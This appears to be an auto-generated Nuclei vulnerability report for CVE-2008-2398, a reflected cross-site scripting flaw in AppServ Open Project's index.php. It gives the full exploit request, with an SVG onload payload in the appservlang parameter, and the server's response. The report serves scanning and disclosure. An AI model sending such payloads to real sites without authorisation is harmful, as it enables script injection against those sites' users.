AppServ Open Project <=2.5.10 - Cross-Site Scripting
Authors
unstabl3
Tags
cve2008, cve, xss, appserv_open_project
Severity
medium
Description
AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
Remediation
Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor.
GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 264
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:56:14 GMT
GET /index.php?appservlang=<svg/onload=confirm('xss')> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Details: CVE-2008-2398 matched at honey.scanme.sh
Protocol: HTTP
Full URL: https://honey.scanme.sh/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E
Timestamp: Tue Apr 30 19:26:14 +0530 IST 2024
Template Information
Request
Response
References:
CURL command
Generated by Nuclei v3.2.5